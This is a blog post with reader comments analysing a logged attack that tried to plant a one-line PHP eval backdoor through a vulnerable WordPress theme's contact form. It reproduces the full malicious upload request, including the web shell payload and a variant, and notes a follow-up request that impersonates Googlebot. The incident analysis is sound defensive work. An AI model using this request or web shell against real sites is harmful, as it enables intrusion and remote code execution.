Attacker attempts to install minimalist backdoor via POST /license.php

This has been quite a week for novel attacks. Prior to the past few days it seemed like nearly 100% of the attacks I observed against my server fell into just a couple of categories:

1) credential guessing via /xmlrpc.php or /wp-login.php, and

2) attempts to exploit WordPress plugin “revslider” vulnerabilities to install malware to my server.

Today’s entry in the new and unusual category is from a server in the US in the colocrossing.com domain. It first attempted a POST / request which my Apache firewall rules rejected and caused the source to be blacklisted. Notice that it is attempting to install the most minimal backdoor you can imagine. It’s just a single-line PHP script that simply evaluates whatever PHP statements the attacker hands it.

POST / HTTP/1.1
Referer: http://skepticism.us
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
Accept: */*
Content-Type: multipart/form-data; boundary=(UploadBoundary)
Host: skepticism.us
Content-Length: 340
Connection: Close

--(UploadBoundary)
Content-Disposition: form-data; name="yiw_contact[]"; filename="sys.php"
Content-Type: text/php

...<?php @eval($_POST["err"]);?>45000

--(UploadBoundary)
Content-Disposition: form-data; name="yiw_action"

sendemail
--(UploadBoundary)
Content-Disposition: form-data; name="id_form"

a_3_3
--(UploadBoundary)

It was apparently trying to exploit either a WordPress plugin or malware already present on my server to create a file named “sys.php” that did nothing more than eval() whatever PHP statements it was handed in a POST request. I did a bit of googling and found a couple of WP plugins that might be relevant but was not able to definitively find a match.

When that upload failed it attempted to create the same file with the same content via a POST /license.php request.

Finally, despite my server having returned HTTP 400 and 403 statuses for all the requests it tried to see if the “sys.php” file was present and could be fetched. Notice it’s sleazy attempt to impersonate the Google web crawler:

GET /sys.php HTTP/1.1
Referer: http://www.googlebot.com/bot.html
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Accept: */*
Host: skepticism.us
Connection: Close
Update 2014-09-24: I just saw the same attack again from someplace in Korea (no reverse DNS or WhoIs data for the address). Only this time the core of the malware is

@eval($_POST["Fktol!coco"])

Notice the POST parameter has changed from err to Fktol!coco.

Published by

Kurtis Rader

I’m first and foremost a Secular Humanist and Atheist. To pay the bills I’m a software engineer. When not working I walk or play with my dogs, read lots of non-fiction (and some fiction), and watch lots of movies.

5 thoughts on “Attacker attempts to install minimalist backdoor via POST /license.php”

  1. I see it in my logs too. First @2015-09-24 03:42:26 UTC POST / HTTP/1.1 followed by GET /wp-content/uploads/sys.php HTTP/1.1.
    Then @2015-09-24 16:36:46 UTC POST /license.php HTTP/1.1 followed by GET /sys.php HTTP/1.1.
    Requests are identical.

    Searching for “yiw_action” reveals only one result – a site in French with both parameters in URL.

    Digging deeper, I found a match in theme code: https://themes.trac.wordpress.org/browser/beauty-clean/1.0/includes/sendemail.php?rev=16509#L15. It is four years old and there have been attempts to fix issues in later versions, but it is full of silly mistakes.

    It is safe to assume that these requests are attempting to exploit that or other theme by same author.

    1. Yes, I think you found the vulnerable code. It looks like the vulnerability being exploited has been “fixed” by renaming the form field that indicates an email attachment is present from “filename” to “tmp_name”. I used scare-quotes around “fixed” because, of course, that does nothing to fix the vulnerability. The script creates a, ostensibly temporary, file into which it copies that form data. But it then fails to remove the file after sending the email. Holy shit! That code is broken in so many ways it’s arguably worse than the “revslider” WP plugin.

  2. The “tmp_name” key is part of PHP file upload handling. See http://php.net/manual/en/features.file-upload.php
    But yes, the code is completely broken.

    That is first published version. Later versions have corrected some of the issues but still fails to sanitise variables or verify source of input. WordPress has built in nonce mechanism and many sanitisation functions but some developers just don’t RTFM.

Comments are closed.